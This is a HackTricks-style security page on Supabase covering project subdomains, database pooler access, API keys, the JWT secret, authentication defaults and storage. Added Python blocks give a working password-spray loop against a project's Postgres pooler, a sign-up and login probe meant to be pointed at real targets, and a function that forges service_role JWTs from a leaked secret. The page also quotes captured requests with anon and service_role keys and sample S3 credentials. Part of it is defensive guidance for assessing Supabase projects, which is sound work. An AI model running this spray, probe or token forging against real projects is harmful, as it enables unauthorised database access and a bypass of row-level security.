# Supabase Security


## Basic Information

According to their landing page: Supabase is an open source Firebase alternative. Start your project with a Postgres database, Authentication, instant APIs, Edge Functions, Realtime subscriptions, Storage, and Vector embeddings.

## Subdomain

Basically, when a project is created, the user gets a `supabase.co` subdomain such as: `jnanozjdybtpqgcwhdiz.supabase.co`. The 20-character project ref in that subdomain is reused as the database username and inside the API keys, so it is the one identifier worth collecting first.

## Database configuration

This information can be found at a link like `https://supabase.com/dashboard/project/<project-id>/settings/database`

The database is deployed in a specific AWS region, and it can be reached through the connection pooler with a DSN such as: `postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]@aws-0-us-west-1.pooler.supabase.com:5432/postgres` (this one was created in us-west-1). The password is the one the user chose when the project was created.

So, because the subdomain is public and doubles as the username, and the set of AWS regions is small, it may be possible to brute-force the database password. The pooler is reachable from the internet by default; only the network restrictions option listed below limits which source IPs may even attempt a login, and only SSL enforcement stops a password from being tried (or captured) over a plain-text connection.

This section also offers options to:

* Reset the database password
* Configure connection pooling
* Configure SSL: reject plain-text connections (plain-text connections are allowed by default, so enforcement has to be turned on explicitly)
* Configure the disk size
* Apply network restrictions and bans
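The enumeration the paragraph above describes, as an added example that is not part of the original page: it parses the pooler DSN shown in the dashboard into its public parts, rebuilds the candidate hosts an attacker can derive from the project ref alone, and runs a throttled password spray through an injectable `connect` callable so the logic can be exercised offline. The region list is a constructed, non-exhaustive sample; `psycopg2` is assumed to be installed only if you call the real connector.

```python
import re
import time
from typing import Callable, Iterable, List, Optional
from urllib.parse import quote

# Constructed, non-exhaustive list of AWS regions a Supabase project can live in.
SUPABASE_AWS_REGIONS = [
    "us-east-1", "us-west-1", "eu-west-1", "eu-central-1",
    "ap-southeast-1", "ap-northeast-1", "ap-south-1", "sa-east-1",
]

# Shape of the pooler DSN shown in the dashboard: the username is postgres.<project-ref>
# and the host name encodes the AWS region.
_POOLER_DSN = re.compile(
    r"^postgres://postgres\.(?P<ref>[a-z]+):(?P<password>[^@]*)"
    r"@aws-0-(?P<region>[a-z]{2}-[a-z]+-\d)\.pooler\.supabase\.com"
    r":(?P<port>\d+)/(?P<db>\w+)$"
)


def parse_pooler_dsn(dsn: str) -> dict:
    """Split a Supabase pooler DSN into project ref, password, region, port and database."""
    match = _POOLER_DSN.match(dsn)
    if not match:
        raise ValueError("not a Supabase pooler DSN")
    return match.groupdict()


def pooler_dsn(ref: str, region: str, password: str, port: int = 5432) -> str:
    """Rebuild a DSN from its public parts; sslmode=require keeps the password off the wire in clear."""
    return (f"postgres://postgres.{ref}:{quote(password, safe='')}@aws-0-{region}"
            f".pooler.supabase.com:{port}/postgres?sslmode=require")


def candidate_targets(ref: str, regions: Iterable[str] = SUPABASE_AWS_REGIONS) -> List[str]:
    """Everything that follows from the subdomain alone: one pooler host per region."""
    return [f"aws-0-{region}.pooler.supabase.com" for region in regions]


def psycopg_connect(dsn: str) -> None:
    """Real connector (assumes psycopg2 is installed); raises on a wrong password or a blocked network."""
    import psycopg2  # imported lazily so the rest of the module works offline
    psycopg2.connect(dsn, connect_timeout=5).close()


def spray(ref: str, region: str, wordlist: Iterable[str],
          connect: Callable[[str], None] = psycopg_connect,
          delay: float = 1.0) -> Optional[str]:
    """Try each password once against the pooler and return the first one that authenticates.

    `connect` is injectable so the loop can be tested without a network; the delay keeps a
    real run from tripping the pooler's rate limiting faster than you can read the output.
    """
    for attempt, password in enumerate(wordlist):
        if attempt:
            time.sleep(delay)
        try:
            connect(pooler_dsn(ref, region, password))
        except Exception:  # wrong password, closed network, timeout: all count as a miss
            continue
        return password
    return None


if __name__ == "__main__":
    parts = parse_pooler_dsn(
        "postgres://postgres.jnanozjdybtpqgcwhdiz:[YOUR-PASSWORD]"
        "@aws-0-us-west-1.pooler.supabase.com:5432/postgres"
    )
    print(parts["ref"], parts["region"])
    for host in candidate_targets(parts["ref"]):
        print(host)
```

Defensively, the same three facts cut the other way: turn on network restrictions so the pooler only answers your own egress IPs, enforce SSL, and treat the project ref as public when choosing the password.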

## API configuration

This information can be found at a link like `https://supabase.com/dashboard/project/<project-id>/settings/api`

The URL used to reach the supabase API of your project looks like: `https://jnanozjdybtpqgcwhdiz.supabase.co`.

### anon api keys

It will also generate an anon API key (`role: "anon"`), such as: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk` which the application needs to send in order to talk to the API, exposed in our example in

The REST API used to talk to this service is documented in the official docs, but the most interesting endpoints are:

<details>

<summary>Sign up (/auth/v1/signup)</summary>

```
POST /auth/v1/signup HTTP/2
Host: id.io.net
Content-Length: 90
X-Client-Info: supabase-js-web/2.39.2
Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Content-Type: application/json;charset=UTF-8
Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://cloud.io.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cloud.io.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```

</details>

<details>

<summary>Login (/auth/v1/token?grant_type=password)</summary>

```
POST /auth/v1/token?grant_type=password HTTP/2
Host: hypzbtgspjkludjcnjxl.supabase.co
Content-Length: 80
X-Client-Info: supabase-js-web/2.39.2
Sec-Ch-Ua: "Not-A.Brand";v="99", "Chromium";v="124"
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Content-Type: application/json;charset=UTF-8
Apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://cloud.io.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cloud.io.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

{"email":"test@exmaple.com","password":"SomeCOmplexPwd239."}
```

</details>

Therefore, whenever you identify a client using supabase through the subdomain it was given (a company subdomain may also be a CNAME pointing at its supabase subdomain, as `id.io.net` is in the capture above), you can try to **create a new account on the platform using the supabase API**. Both requests carry the anon key twice, in the `Apikey` header and as the `Authorization` bearer, so the anon key alone is enough to drive the auth endpoints.
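The sign-up and login exchange from the captured requests above, as an added example that is not part of the original page: it builds the two GoTrue requests with the `apikey` and `Authorization: Bearer` headers a supabase-js client sends, then classifies each reply into what it says about the target (sign-up open with or without email confirmation, denied, rate limited). The HTTP transport is injectable, and the `constructed_opener` replies are constructed to model a project that requires email confirmation and has anonymous sign-ins disabled; the error codes in them and the assumption that an anonymous sign-in is a `/signup` POST without credentials are mine, not something the page states.

```python
import io
import json
import urllib.request
from urllib.error import HTTPError

# Values taken from the captured requests above; the account details are throwaway test values.
BASE_URL = "https://hypzbtgspjkludjcnjxl.supabase.co"
ANON_KEY = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwi"
            "cm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk")


def auth_request(base_url: str, anon_key: str, path: str, body: dict) -> urllib.request.Request:
    """Build a GoTrue request with the two headers supabase-js always sends alongside the anon key."""
    headers = {
        "apikey": anon_key,
        "Authorization": f"Bearer {anon_key}",
        "Content-Type": "application/json;charset=UTF-8",
    }
    return urllib.request.Request(base_url.rstrip("/") + path, data=json.dumps(body).encode(),
                                  headers=headers, method="POST")


def send(req: urllib.request.Request, opener=None):
    """Return (status, json body); 4xx/5xx replies are returned rather than raised."""
    open_ = opener or urllib.request.urlopen
    try:
        with open_(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read() or b"{}")
    except HTTPError as err:
        return err.code, json.loads(err.read() or b"{}")


def classify(status: int, body: dict) -> str:
    """Map a GoTrue reply onto what it means for the target's sign-up posture."""
    if status == 200 and body.get("access_token"):
        return "session-issued"                      # logged in at once: no email confirmation
    if status == 200 and body.get("id"):
        return "user-created-pending-confirmation"   # account exists but cannot log in yet
    if status == 429:
        return "rate-limited"
    reason = body.get("error_code") or body.get("msg") or body.get("error_description") or str(status)
    return f"denied:{reason}"


def probe(base_url: str, anon_key: str, email: str, password: str, opener=None) -> dict:
    """Sign up, try a password login, then try an anonymous sign-in, classifying each reply."""
    steps = {
        "signup": ("/auth/v1/signup", {"email": email, "password": password}),
        "login": ("/auth/v1/token?grant_type=password", {"email": email, "password": password}),
        # Assumption: anonymous sign-in is a /signup POST carrying no credentials, as supabase-js does it.
        "anonymous": ("/auth/v1/signup", {}),
    }
    return {name: classify(*send(auth_request(base_url, anon_key, path, body), opener))
            for name, (path, body) in steps.items()}


class _Reply:
    """Minimal stand-in for an HTTP response so the whole flow can run offline."""
    def __init__(self, body: dict):
        self.status, self._body = 200, json.dumps(body).encode()
    def read(self): return self._body
    def __enter__(self): return self
    def __exit__(self, *exc): return False


def constructed_opener(req: urllib.request.Request, timeout: int = 10):
    """Constructed replies: email confirmation required, anonymous sign-ins disabled."""
    path = req.full_url.split("supabase.co", 1)[1]
    body = json.loads(req.data)
    if path == "/auth/v1/signup" and body.get("email"):
        return _Reply({"id": "00000000-0000-4000-8000-000000000000", "email": body["email"],
                       "confirmation_sent_at": "2024-05-06T10:00:00Z"})
    if "token" in path:
        err = {"code": 400, "error_code": "email_not_confirmed", "msg": "Email not confirmed"}
    else:
        err = {"code": 422, "error_code": "anonymous_provider_disabled", "msg": "Anonymous sign-ins are disabled"}
    raise HTTPError(req.full_url, err["code"], err["msg"], {}, io.BytesIO(json.dumps(err).encode()))


if __name__ == "__main__":
    # Drop `opener=` to let urllib send the real requests to a target you are authorised to test.
    print(probe(BASE_URL, ANON_KEY, "test@exmaple.com", "SomeCOmplexPwd239.", opener=constructed_opener))
```

A `session-issued` result on the sign-up step means the project either auto-confirms email or has anonymous sign-ins on; the `access_token` it returns is an `authenticated`-role JWT that can be sent as the bearer to `/rest/v1/` to test what the RLS policies actually expose to a self-registered user.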

### secret / service\_role api keys

A secret API key is also generated with **`role: "service_role"`**. This key must be kept secret because it **bypasses Row Level Security**: any request carrying it reads and writes every table regardless of the policies that protect the `anon` and `authenticated` roles, so it belongs only in backend code, never in a browser or mobile bundle.

The API key looks like this: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwicm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ.0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354`

### JWT Secret

A **JWT Secret** is also generated so the application can **create and sign custom JWT tokens**. Both API keys above are plain HS256 JWTs signed with this same secret, so whoever holds it can mint a `service_role` token of their own; it is at least as sensitive as the service\_role key.
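A triage helper for the anon key, the service\_role key and the JWT secret discussed above, as an added example that is not part of the original page: it decodes a Supabase API key without verifying it (to read `ref`, `role` and `exp` and rate the leak), checks whether a candidate secret reproduces a key's HS256 signature, and mints a Supabase-shaped JWT from a secret to show what the JWT Secret setting makes possible. The two keys embedded are the ones quoted on this page; the secret used to mint is constructed, since the page does not (and should not) show a real one.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# API keys as quoted on this page.
ANON_KEY = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwi"
            "cm9sZSI6ImFub24iLCJpYXQiOjE3MTQ5OTI3MTksImV4cCI6MjAzMDU2ODcxOX0.sRN0iMGM5J741pXav7UxeChyqBE9_Z-T0tLA9Zehvqk")
SERVICE_KEY = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImpuYW5vemRyb2J0cHFnY3doZGl6Iiwi"
               "cm9sZSI6InNlcnZpY2Vfcm9sZSIsImlhdCI6MTcxNDk5MjcxOSwiZXhwIjoyMDMwNTY4NzE5fQ."
               "0a8fHGp3N_GiPq0y0dwfs06ywd-zhTwsm486Tha7354")


def _b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def inspect_key(token: str) -> dict:
    """Read the unverified claims of a Supabase API key and rate how bad a leak of it is."""
    header_b64, payload_b64, _signature = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    claims = json.loads(_b64url_decode(payload_b64))
    role, ref = claims.get("role"), claims.get("ref")
    return {
        "alg": header.get("alg"),
        "ref": ref,
        "role": role,
        "expired": claims.get("exp", 0) < time.time(),
        "bypasses_rls": role == "service_role",
        "severity": "critical" if role == "service_role" else "info",
        # The ref claim alone tells you which project the key belongs to.
        "rest_url": f"https://{ref}.supabase.co/rest/v1/",
        "auth_url": f"https://{ref}.supabase.co/auth/v1/",
    }


def verify_hs256(token: str, secret: str) -> bool:
    """True if `secret` reproduces the token's signature, i.e. it is the project's JWT secret."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def mint_jwt(secret: str, ref: str, role: str, ttl: int = 3600, extra: Optional[dict] = None) -> str:
    """Sign a Supabase-shaped JWT with the project secret; role is honoured by PostgREST as-is."""
    now = int(time.time())
    header = {"alg": "HS256", "typ": "JWT"}
    claims = {"iss": "supabase", "ref": ref, "role": role, "iat": now, "exp": now + ttl}
    claims.update(extra or {})
    signing_input = ".".join(_b64url_encode(json.dumps(part, separators=(",", ":")).encode())
                             for part in (header, claims))
    signature = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(signature)}"


if __name__ == "__main__":
    for key in (ANON_KEY, SERVICE_KEY):
        print(inspect_key(key))
    # Constructed secret: the real one lives in Settings > API and must never reach a client.
    forged = mint_jwt("constructed-jwt-secret", "jnanozjdybtpqgcwhdiz", "service_role")
    print(inspect_key(forged)["severity"], verify_hs256(forged, "constructed-jwt-secret"))
```

Note that the `ref` claim inside the two keys quoted on this page reads `jnanozdrobtpqgcwhdiz`, which is not the subdomain quoted earlier; when attributing a key found in a bundle or repo, trust the claim over the host you found it on. `verify_hs256` is also the right way to check a suspected JWT-secret leak: a secret that validates a known anon key is the project's real one.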

## Authentication

### Sign up

<div data-gb-custom-block data-tag="hint" data-style='success'>

By **default** supabase lets **new users create accounts** on your project through the API endpoints shown above.

</div>

However, by default these new accounts **must confirm their email address** before they can log in. It is possible to enable **"Allow anonymous sign-ins"**, which lets people log in without confirming, or even supplying, an email address. That can expose **unexpected data**, because such users get the `public` and `authenticated` roles and therefore every RLS policy written for `authenticated`.\
It is also a really bad idea because supabase charges per active user, so anyone can create users and log in, and supabase will bill for them:

<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

### Passwords & sessions

It is possible to set a minimum password length (6 by default), character requirements (none by default) and to reject passwords that appear in known leaks.\
It is recommended to **tighten these requirements, as the defaults are weak**.

* User Sessions: how user sessions behave can be configured (timeouts, one session per user...)
* Bot and Abuse Protection: a Captcha can be enabled.

### SMTP Settings

It is possible to configure SMTP to send the emails.

### Advanced Settings

* Set the access token expiry time (3600 seconds by default)
* Enable detection and revocation of potentially compromised refresh tokens, and the reuse interval
* MFA: set how many MFA factors a user can have enrolled at once (10 by default)
* Max Direct Database Connections: maximum number of connections used by Auth (10 by default)
* Max Request Duration: maximum time an Auth request may take (10s by default)

## Storage

<div data-gb-custom-block data-tag="hint" data-style='success'>

Supabase allows **storing files** and serving them through a URL (it uses S3 buckets).

</div>

* Set a limit on the size of uploaded files (50MB by default)
* The S3-compatible endpoint is available at a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
* It is possible to **request S3 access keys**, made up of an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`); these grant access to every bucket in the project without going through the storage RLS policies, so they deserve the same handling as the service\_role key

## Edge Functions

It is also possible to **store secrets** in supabase that will be **available to edge functions** (they can be created and deleted from the web UI, but their values cannot be read back from it).

<div data-gb-custom-block data-tag="hint" data-style='success'>

Learn & practice AWS Hacking:<img src="../.gitbook/assets/image (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/image (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

</div>
